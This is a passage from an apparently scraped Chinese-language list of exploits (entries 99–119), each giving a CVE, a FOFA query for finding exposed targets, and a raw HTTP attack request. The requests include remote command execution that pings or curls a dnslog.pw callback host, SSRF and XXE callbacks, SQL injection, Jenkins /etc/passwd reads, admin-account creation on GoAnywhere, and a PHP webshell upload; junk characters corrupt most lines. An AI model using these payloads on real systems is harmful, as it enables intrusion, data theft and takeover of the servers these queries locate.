X-Requested-With: XMLHttpRequest
8 Z% \' |4 o* P, @& N" a$ K" p: _/ ]3 M9 `" H
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B( I1 e* ]( o5 ]- P$ x
- K3 S9 k% k) H6 L% s( b1 P- R* x `: P' g
99. Ncast盈可视高清智能录播系统busiFacade RCE; U8 v7 f2 \/ I
CVE-2024-0305' Q( ]/ d- N0 m. z. q# n
FOFA:app="Ncast-产品" && title=="高清智能录播系统") b( c- T8 T4 i% J9 Q
POST /classes/common/busiFacade.php HTTP/1.1
: p8 y. h5 X* ^! u0 BHost: 192.168.40.130:8080
P, g( z# Z( w2 |+ e( IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
# U. j7 U5 b9 x1 d2 I1 kConnection: close
% Y l, q9 z$ d2 F( HContent-Length: 154
- s! n5 w, X5 t5 UAccept: */*
" J& u+ ?5 d" P+ R% F* i! k9 gAccept-Encoding: gzip, deflate' H8 Z0 j9 x8 c7 v9 {- J ?+ c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* \" ~" c1 K* m
Content-Type: application/x-www-form-urlencoded; charset=UTF-81 R5 o9 r2 N% b; t C' o6 h
X-Requested-With: XMLHttpRequest1 X2 ]6 Q2 C: o
$ G+ z9 J, e4 Z5 s C2 C9 g$ |; P
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D z2 Z2 N* _3 t' J* x$ Q
8 W6 L) R$ f' a$ F: W" @( @7 A
9 m" Z) r& c* A3 J0 s, j' E0 l100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
) V* L( I8 A6 r; E5 kCVE-2024-0352$ Q6 T: g, O* b2 }9 M) U: i
FOFA:icon_hash="874152924"
c: K* |- w+ R" R+ X' EPOST /api/file/formimage HTTP/1.1$ ]6 \/ K+ Z" j5 Z# z. f7 q9 q
Host: 192.168.40.130
+ w) t5 ?! B) W( x% a- pUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
: A! p' V0 x# rConnection: close
" V+ M2 [! `9 |. q# c8 X8 Z" EContent-Length: 201
, ?% A0 \, ]! n' PContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei. U6 S5 \% t: @3 o0 e' ^, f
Accept-Encoding: gzip4 j& ?% Z3 Q+ d8 W: F
! `- u# ]: m: e# Q$ j------WebKitFormBoundarygcflwtei% X. n( ?2 C$ u* I: p Z
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
" ? Z% [# M7 |, |Content-Type: application/x-php. r9 l/ z) Y; N9 M
6 c- K0 X" ]- b3 W8 D2ayyhRXiAsKXL8olvF5s4qqyI2O
, @9 @3 X" K7 }& Z( Q9 t------WebKitFormBoundarygcflwtei--6 D9 `, o c+ Y7 s! k n
4 u; X+ F! N+ t; r$ l2 W4 n. ]( I5 L. O9 L3 C: y1 f
101. ivanti policy secure-22.6命令注入# o3 C4 K( I6 `" |+ P8 ]7 J. o
CVE-2024-21887
% l$ m' w$ E' L* ^7 V9 A: G( z1 QFOFA:body="welcome.cgi?p=logo". J+ c. `# i0 p
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1; {1 Y+ F! R8 T1 E' w7 E4 ]. C
Host: x.x.x.xx.x.x.x S' \& @- o/ |+ |4 H1 L9 T' z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 o) d. ]# }" Z3 Y3 YConnection: close: D$ C1 t5 z/ }0 s% O$ G$ m. j
Accept-Encoding: gzip
9 ]3 D6 V* V9 J5 m6 E1 V
& {* m/ K% E0 a& ~6 [* v
3 `# i6 A( _, s) G5 d, X! g/ M2 \102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行, v9 e! o8 p5 t7 t" G- Y& J
CVE-2024-21893
: q% O+ @/ D$ s: d, X# KFOFA:body="welcome.cgi?p=logo"7 S' l9 Z2 f# l3 H5 z( `: ~
POST /dana-ws/saml20.ws HTTP/1.1
; t# A: x' l1 |1 q" z9 C& bHost: x.x.x.x* J* K6 K/ l7 J0 k9 t8 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36% q3 ^' G' ^& a
Connection: close9 y) @, z, s* n" w: P7 ~
Content-Length: 792
[+ ` g- {3 [Accept-Encoding: gzip
* q9 q. f& f9 L% N
7 \) R! `- u( S/ F& a7 l- u<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>4 D* o" C. k$ d7 q0 r/ `3 z Z4 L
+ U8 q; F5 n, h7 X3 E
103. Ivanti Pulse Connect Secure VPN XXE g+ \2 ]& w: {! P* ?3 @& ^4 f* D/ o
CVE-2024-22024, [ q- i! J3 ?2 K
FOFA:body="welcome.cgi?p=logo"% j/ {, v" F+ ~% _
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
! {: p2 \2 W1 m z) P% vHost: 192.168.40.130:1116 e" Q' z0 s5 C! Q
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
) z( K4 O R; R5 {1 lConnection: close
" Z j) B3 E+ VContent-Length: 204, D2 Z* M: u- |
Content-Type: application/x-www-form-urlencoded
, |6 f* o; v1 s) O# g% P y0 ^Accept-Encoding: gzip
, t+ X& G8 Y2 W7 y9 g1 y/ U2 J; ~8 ]6 X( m# l: P
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==- _. E# y8 _3 Z0 t- K ^* c
$ J( e; k5 J1 ~2 X' D
# U, Z! e% K, X9 E& ?: ^* Y- _& x其中SAMLRequest的值是xml文件内容的base64值,xml文件如下8 J u& k: c% @0 x2 ` U c
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>% {* T, r5 p8 v8 ~& B
2 h; q/ ` w2 M z8 S' F& b2 r* q- [
4 f: }, Y( R0 p$ Y# }3 W8 h. P104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
' |3 r+ Y( ]8 w7 L9 T6 |CVE-2024-0569
' q0 a) s2 j9 e5 HFOFA:title="TOTOLINK"7 c, }- ^ N3 H" Z
POST /cgi-bin/cstecgi.cgi HTTP/1.1" |, N" e( z+ q' j( C2 I# D
Host:192.168.0.1- b# m3 A4 N+ S' h! X5 N) U
Content-Length:41/ J0 j. h& U) z1 j
Accept:application/json,text/javascript,*/*;q=0.012 v! D1 O7 W: B2 ~1 [. E2 m5 a; u
X-Requested-with: XMLHttpRequest* N- f- {7 n( V+ @# \/ q- S v% S- C
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
' U0 }* X, ~; D8 B+ {0 wContent-Type: application/x-www-form-urlencoded:charset=UTF-88 ^+ D) i& Q! b0 W7 ?7 k
Origin: http://192.168.0.1
' n1 q3 ^2 U3 k" n2 n" Y7 nReferer: http://192.168.0.1/advance/index.html?time=1671152380564
8 p( w1 S6 g1 W) L$ o3 EAccept-Encoding:gzip,deflate
2 d3 m9 ~4 q; w) Q- y' e$ R' IAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7/ O* P3 C0 k) o/ F+ J2 Y
Connection:close
# b$ Q3 f2 V- n- H9 n
/ ^( B+ t `8 ~6 B{. X2 p9 u9 E' r5 m
"topicurl":"getSysStatusCfg",
8 S M! ?- m6 K7 H; U"token":""
( `5 S! J. X" M& }}0 A. c" _* v0 f! Q9 S" Z, a2 D0 }
- x5 C: |+ f, u& m3 K
105. SpringBlade v3.2.0 export-user SQL 注入
- P0 |0 n2 y" Y7 T# `" B0 WFOFA:body="https://bladex.vip"
( g' t4 E" L8 m/ k* s/ m- t' f& d& P4 vhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
|. B+ c' |) N8 h
. Q4 c$ ] |6 ~/ J! C8 |0 u106. SpringBlade dict-biz/list SQL 注入
+ k0 z @' }3 i" `& L5 C/ n3 rFOFA:body="Saber 将不能正常工作"
6 c8 c* z5 g* q4 p# c1 f, N. FGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.12 D/ k$ l: t, Q( N3 [7 R/ d/ w
Host: your-ip
M# e. ~) h) \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ S& [' u, Y" Y: B5 q9 e: y
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
. Q O7 c( c, d' L8 {Accept-Encoding: gzip, deflate8 B# f/ }9 B1 M9 M _$ l
Accept-Language: zh-CN,zh;q=0.90 ]5 o5 O; o0 B, f, p! m' @
Connection: close
; S1 d2 ?: l+ j' E$ a. f, O1 [5 G. K8 F9 X7 @& ^
) [; y5 }( m' }( D
107. SpringBlade tenant/list SQL 注入4 y+ w+ }8 x6 r
FOFA:body="https://bladex.vip"
/ t$ F; D7 X. i, V$ I$ [0 nGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1* g3 U2 L, w) U) _, F5 s# n
Host: your-ip
/ v/ n* H6 s! E, V3 u% CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" o$ V- U- O: B5 \Blade-Auth:替换为自己的
9 [& M0 ~( ]3 W3 WConnection: close
* V4 b5 B4 g2 R3 s/ I! Y3 n
G- R a0 D( Z! p, L3 ?3 x+ h3 i7 B* z5 J! E
108. D-Tale 3.9.0 SSRF, X+ x& P j& s5 J1 X% g+ o9 N
CVE-2024-21642
; j+ H3 k! ?3 u, G; O/ }FOFA:"dtale/static/images/favicon.png"
5 \2 F& L4 [0 pGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1, [: Z- y, [$ { _! X9 f" Y
Host: your-ip/ D5 Z: {" r' O7 H3 H' N( n- A
Accept: application/json, text/plain, */*
4 s& \( b% Q% f' F4 h ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.361 w2 ]% q& w! ~+ ?8 T) c/ j4 @
Accept-Encoding: gzip, deflate
* h3 a8 d3 G: {2 x. HAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
9 }* E q1 _' w& F9 H# x2 O, MConnection: close C( B$ ]$ w+ Y8 K
% |5 ^+ e. B0 y, S, x! v
8 H3 s& w3 Z: H/ M7 d109. Jenkins CLI 任意文件读取
* a( D c& _$ G3 ^6 V. g; KCVE-2024-23897
- j$ w/ W6 A9 s! o R+ V- _FOFA:header="X-Jenkins"2 p$ E! F* W+ P7 Y- s$ e
POST /cli?remoting=false HTTP/1.1
$ |/ `; s# B1 [- \' n# MHost:
0 ~' ?; L, R3 s' U: YContent-type: application/octet-stream) ]! z1 D& a" H8 O
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
0 |9 }5 Z7 I; V7 z4 L2 ~# ?Side: upload9 o* A1 t G. c
Connection: keep-alive
, g0 @' g8 K& cContent-Length: 163$ q9 y. a$ u; h9 B' k
$ Q7 C/ M5 `; _0 C1 }: {4 L% g
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
' d" \+ q. c2 N7 ~4 ^: x3 I7 B7 J; V8 A6 b) n) ^3 C
( [ d( D2 i0 M, r8 L0 G8 M. ePOST /cli?remoting=false HTTP/1.1
! ^ T; n* s' V4 THost:7 R# u7 w0 i* m& ` Y/ K
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
$ Q6 r# B$ b/ xdownload
0 ^& M8 S J2 ~8 `; n, `Content-Type: application/x-www-form-urlencoded+ i2 C' m5 o$ V O2 t4 i
Content-Length: 04 b- `% H: T7 K) r9 ~( G
; x% H4 V/ k8 X& c$ K R& s8 [% c: \
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin. z* Y' M# _! T& M' K- H
java -jar jenkins-cli.jar help
* x1 U7 y4 c7 W3 \4 @[COMMAND]) n5 t- u% D+ B+ w1 W
Lists all the available commands or a detailed description of single command.
, J: u" ]1 b2 J8 j! M COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)3 @ t6 K; f" L( R9 E% x
6 L4 w: n8 t& U6 q% j
$ q- Y$ a E/ h$ G' C7 K5 m$ D110. Goanywhere MFT 未授权创建管理员
R4 S0 Y; y( \. ACVE-2024-0204
! `& F/ Y( r! C5 j/ A3 _( R& `FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"+ ~! T: a3 d+ i; l0 s; P5 V# q: L
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1! G8 P6 Q2 F( D# M6 e0 A5 d K* R
Host: 192.168.40.130:80005 P" {# [( D+ u2 F2 Y0 e2 K
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36! U9 [. G4 Q% q- ?% X( \
Connection: close
: J9 y! k* @* U4 Z- G: r6 oAccept: */*! G' Y! H4 X. T4 z R
Accept-Language: en
' C/ Q2 |/ U0 g7 \$ |Accept-Encoding: gzip
0 o+ r" ~% A, }% Y3 Z; _5 N; _3 j4 Y7 k7 ?5 Q g, z* S( C) T2 m
& H: m2 T9 g( O% ?
111. WordPress Plugin HTML5 Video Player SQL注入
1 V2 {) a* [& Q# Q8 q/ v) Z$ _CVE-2024-1061
2 ?( w. Z$ V7 ]FOFA:"wordpress" && body="html5-video-player") t; e9 ~/ O5 ^4 z5 F. f2 e
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1' k3 C9 W& n: Z, F/ Y: h2 v
Host: 192.168.40.130:112
0 c& v1 o' w8 \4 P8 T8 @User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36! F$ j- H* l9 |
Connection: close
$ d. }$ k& K$ j8 W* P1 AAccept: */*
- P6 C# O/ R$ x, I- B8 k+ s; g3 n- ZAccept-Language: en
, y- s1 q6 ~: M5 \* A" _Accept-Encoding: gzip
$ c$ {/ n, r8 D N# H4 q: A6 f
8 I" v- x$ O2 M) T# U0 r/ a% M9 U8 z! r1 u# _, h1 m5 y/ u7 V- @( j
112. WordPress Plugin NotificationX SQL 注入
* s v5 n: v3 t2 p0 L9 BCVE-2024-16987 Y. f! L$ T; N w9 {& |
FOFA:body="/wp-content/plugins/notificationx"
0 u( o, W6 N- I) WPOST /wp-json/notificationx/v1/analytics HTTP/1.1+ V! k0 u6 d. ~) S" S
Host: {{Hostname}}
- R% @# Q9 e$ v+ T: J0 l ZContent-Type: application/json
# M) B6 h9 I/ |$ D2 Q/ L% \* Z4 I9 h6 z( o/ @. F& J
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
2 z* ]8 D+ q: S% g3 q% w* n4 H" B( f1 N( }* F `; C( w3 Q+ h
2 [) A- Y5 N4 t113. WordPress Automatic 插件任意文件下载和SSRF
3 [( i& d+ R/ l' v9 |7 @7 ICVE-2024-27954- b& }9 h; ~" q0 C* |6 u" E
FOFA:"/wp-content/plugins/wp-automatic"* {7 R. b$ T0 t( O& z- g9 A5 ]
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.14 `& q# F' ^5 Q. i0 {' R
Host: x.x.x.x
8 q& O( c+ w1 cUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36; i5 p/ O( g1 ]
Connection: close+ `: _2 L2 K& l+ m" \
Accept: */*4 c' ]2 v+ r, W! }% [7 s4 Y
Accept-Language: en
) n( o. D# z; k& T7 l+ U$ `Accept-Encoding: gzip
: u0 z. f4 w- e* z. k( \5 U1 w6 P9 s1 {' O# J! z- z# i$ P. y
; f' ^! K) O" }& C! e0 ]' M5 c W* m$ y
114. WordPress MasterStudy LMS插件 SQL注入
( g0 C. a0 ?4 t' M8 a$ B. W5 [! }FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/" Y0 r' d+ ^9 W' d7 z
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.10 j+ P E. }, _) T* J6 A) N; u6 X
Host: your-ip7 \" x% l: B( O( V7 }
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 n% \. p. ]2 ?0 i* _; B
Accept-Charset: utf-8
O$ J# v( Y8 Y: i, P% dAccept-Encoding: gzip, deflate: M; B+ t. O! a5 _- @6 B
Connection: close" e# S* y n L1 |
) U3 i5 \- M7 v. F2 o# x& L* G! }
E c# R7 P( z8 i4 m$ q/ G
115. WordPress Bricks Builder <= 1.9.6 RCE
7 M3 z( w3 a- K8 b: b* h7 \+ UCVE-2024-25600! i( s9 U: ~+ M5 o+ ?* _6 C
FOFA: body="/wp-content/themes/bricks/"
; Q( m9 n+ `2 }$ F% T$ H! Z7 u: J第一步,获取网站的nonce值
0 c: R5 C3 n1 CGET / HTTP/1.1
( l' ]* q. }1 Z4 z" Y- E! ~4 {/ gHost: x.x.x.x- p- Q. m0 x; e2 _; L2 `+ A% t
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
+ x o( T0 i: v6 C) Y/ kConnection: close
: G d) ?2 Q+ X( n- V7 e( GAccept-Encoding: gzip. w' i9 F8 h5 G0 R9 P
7 b/ L0 {7 j3 q' E+ c8 J% N
( p5 V# t/ g% Z" X第二步替换nonce值,执行命令2 a: k- h, d8 L& s: A( Y
POST /wp-json/bricks/v1/render_element HTTP/1.11 b' p* ~ O( X2 B7 l( J
Host: x.x.x.x# X; b9 r P8 L5 `3 C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
" J8 Y( q3 ^- P5 t: M* o4 D3 dConnection: close
8 H0 N9 w9 U9 _# Q" p8 m2 _Content-Length: 356
2 ] _0 `. ^* E* pContent-Type: application/json
2 C! X# i! W0 T& U8 |# s$ AAccept-Encoding: gzip& k, V: i; ^6 E' |
6 ~% U1 N8 z& e6 Y" ?: Q{" q% [1 p! v; H- u9 i% P3 y
"postId": "1",. P8 k! p4 O" v/ d5 e
"nonce": "第一步获得的值",
% P! z$ X' B8 ]' D "element": {
9 @) f& H) V8 J2 a' ]5 P! R "name": "container",
6 w9 r6 H) s+ ^$ `& ?9 o5 y "settings": {5 `- y2 R. z2 a9 W d
"hasLoop": "true",
7 [+ }7 f2 l1 P* M6 o9 [ "query": {( O' B) @+ n, D3 }) H
"useQueryEditor": true,' ?. @+ u6 w1 x* Q
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",2 E5 N2 z. Q" K8 }0 E, c3 X
"objectType": "post"
5 M+ w e" b3 t }
+ ^: j g5 G4 G5 x3 R3 L" j0 L }# ?' T- h, N, W9 w2 b2 |
}6 [) i9 Q# U9 ~8 k6 X2 O2 Y) q, r
}4 \ M# z; r7 C1 J
" R2 d2 r2 k0 J& P" g
k7 _( m, B- z; G! u
116. wordpress js-support-ticket文件上传
' ~8 S; y$ N* x2 q9 |9 h0 KFOFA:body="wp-content/plugins/js-support-ticket"
! ]* E7 t6 I, Y$ V* X6 z/ ^7 s" H: }POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1* o* y3 y4 _' g
Host: V- ?$ u; ^9 W5 ^# d t
Content-Type: multipart/form-data; boundary=--------7670991712 v, \ O" U: s/ ]
User-Agent: Mozilla/5.0
$ |* U! p \. N' A5 U% y
* W; H' _2 Y% @$ y, ^/ @----------767099171
5 j. i6 I M4 r' _/ { iContent-Disposition: form-data; name="action"- y" n( ]3 f0 z
configuration_saveconfiguration( b0 j9 W! M( _ F6 T2 d
----------767099171) V& {: j- p" K, x0 ?+ k0 ~
Content-Disposition: form-data; name="form_request"7 U, V m3 R: w" w$ Z
jssupportticket
, {/ w7 \2 L/ n) Z- x----------767099171
, f; L8 @' B; u; ^6 sContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
* c" a# @/ Q$ g: y5 K: T1 e" @Content-Type: image/png# F( n8 j% c# v
----------767099171--+ c/ y2 l# w G8 b Q. g: q" S
1 @0 t) k! a" Z
- w9 D$ q/ N3 g3 m3 d# A117. WordPress LayerSlider插件SQL注入
, Z+ [. t$ f% r8 X" u+ oversion:7.9.11 – 7.10.0% ^; k ^; S0 s% Q
FOFA:body="/wp-content/plugins/LayerSlider/"1 T+ F [% G0 {9 V! j9 u- F2 f1 Y
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
: B1 @" e" y6 t( k, o- ]9 e9 nHost: your-ip. u4 I A9 j) p) ~0 C1 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: p: P) }( Y. o6 @$ PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 |8 ^' m1 K6 w3 d* ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
d+ K) M- Z) d& LAccept-Encoding: gzip, deflate, br
% N0 s1 X/ I2 f4 oConnection: close5 V5 ?# A* V5 \: |7 g# Z: x0 s- K8 l. F
Upgrade-Insecure-Requests: 1
/ L) b1 Y. }* K- s& {2 J& U# G3 ~' w* N
" x5 H' Y& b3 F+ e+ z( g! ^% q
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传/ [4 k. M% K, K' z1 J
CVE-2024-0939
1 E% O4 l, u' t0 eFOFA:title="Smart管理平台"
9 @: E0 r8 {( [POST /Tool/uploadfile.php? HTTP/1.1 D2 q- c$ q+ Y+ {8 ]3 n
Host: 192.168.40.130:8443
$ F+ N3 K5 `3 \Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
' }* j, M% P( h! \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.06 o- H2 V) R8 t. n3 ~( }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% w: R: _7 r# u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 `* R8 e( _: @; _3 n
Accept-Encoding: gzip, deflate4 s/ @. x, d' F: W, d, z7 y
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
2 s3 K9 e: \6 FContent-Length: 405" p% G9 o# s4 y6 n0 i$ |$ M* M6 L" U
Origin: https://192.168.40.130:84431 ]5 E5 O1 \( m* t+ v7 h& U
Referer: https://192.168.40.130:8443/Tool/uploadfile.php0 E) [$ i2 V7 i7 V: C: ^3 }
Upgrade-Insecure-Requests: 1+ P* F. \3 \8 h8 N4 f2 f7 G' L
Sec-Fetch-Dest: document2 R* J1 h- q1 |
Sec-Fetch-Mode: navigate/ h5 z1 B M$ Y( |
Sec-Fetch-Site: same-origin4 a! l/ H) n, I& w; x" ~
Sec-Fetch-User: ?1- P0 @; A! c" J* k, D
Te: trailers
4 [: x: u' } b/ X" l5 ]; jConnection: close
/ D! W2 Y3 T+ ~6 @* g+ G3 M
6 i% A1 u. s. b. z; j-----------------------------139797012227476466340371828875 [3 Y9 C' B7 F8 j6 P$ E6 O
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
$ {3 M, \2 D' d* } @Content-Type: application/octet-stream
9 |' A# Z- y; m. ^
! c W3 n1 @) N" J& F, x' c<?php
3 H% f1 L* k( \ D2 [0 A( Isystem($_POST["passwd"]);8 T% X. }+ x4 C$ ^2 l* ]
?>
{3 u. x2 ]- `-----------------------------139797012227476466340371828873 d' E" N3 d k
Content-Disposition: form-data; name="txt_path"# Y& z) h7 b& P+ T* C" _; t
' |. Z3 i& W) ~; l& F/ Q8 K8 W) `/home/src.php9 V0 b4 m2 o3 [* [
-----------------------------13979701222747646634037182887--
: u! a9 a/ s0 a- w* J6 K6 F5 y8 g) g$ }5 h, v# P
. h r0 y, z" B' B访问/home/src.php
' P$ }4 K/ v+ L. ~4 Q8 [. H7 o* L1 n; o0 _5 R2 |
119. 北京百绰智能S20后台sysmanageajax.php sql注入* {+ J: U* @+ ]. `
CVE-2024-1254
/ ^3 o; Y1 E! W1 `' H" q: j2 g; \FOFA:title="Smart管理平台"
, z' F$ r# e- Q先登录进入系统,默认账号密码为admin/admin
; [; @3 d! p& t2 RPOST /sysmanage/sysmanageajax.php HTTP/1.11
) X: n7 F( L" ~$ a9 M" m# _Host: x.x.x.x# N; j7 M' ~9 j
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee8 Y1 }4 R! G% u8 w: ?' @, k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 L8 q3 u. C0 g3 ?5 f- N
Accept: */*3 [/ s9 D# h% _* r$ U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; E: ^- A$ T8 J& [4 M3 r( @7 P
Accept-Encoding: gzip, deflate
" F- N% L) D/ N _( b3 jContent-Type: application/x-www-form-urlencoded;6 D1 c; a, ~3 B% g
Content-Length: 109
! _! `8 x8 }0 ]6 J5 C4 T, s/ BOrigin: https://58.18.133.60:8443
0 m, U3 h; P: f1 @' lReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
6 G& t4 ~- Z, P( g: LSec-Fetch-Dest: empty
+ Y. u- m$ j0 J3 S$ h" y+ h( zSec-Fetch-Mode: cors
$ h2 g3 D) @* |* C( j+ tSec-Fetch-Site: same-origin
! r% j+ v2 J- X) O1 b) ?X-Forwarded-For: 1.1.1.1
) B0 x, \5 F, E: U9 vX-Originating-Ip: 1.1.1.11 Z Q" b2 h# z r# M
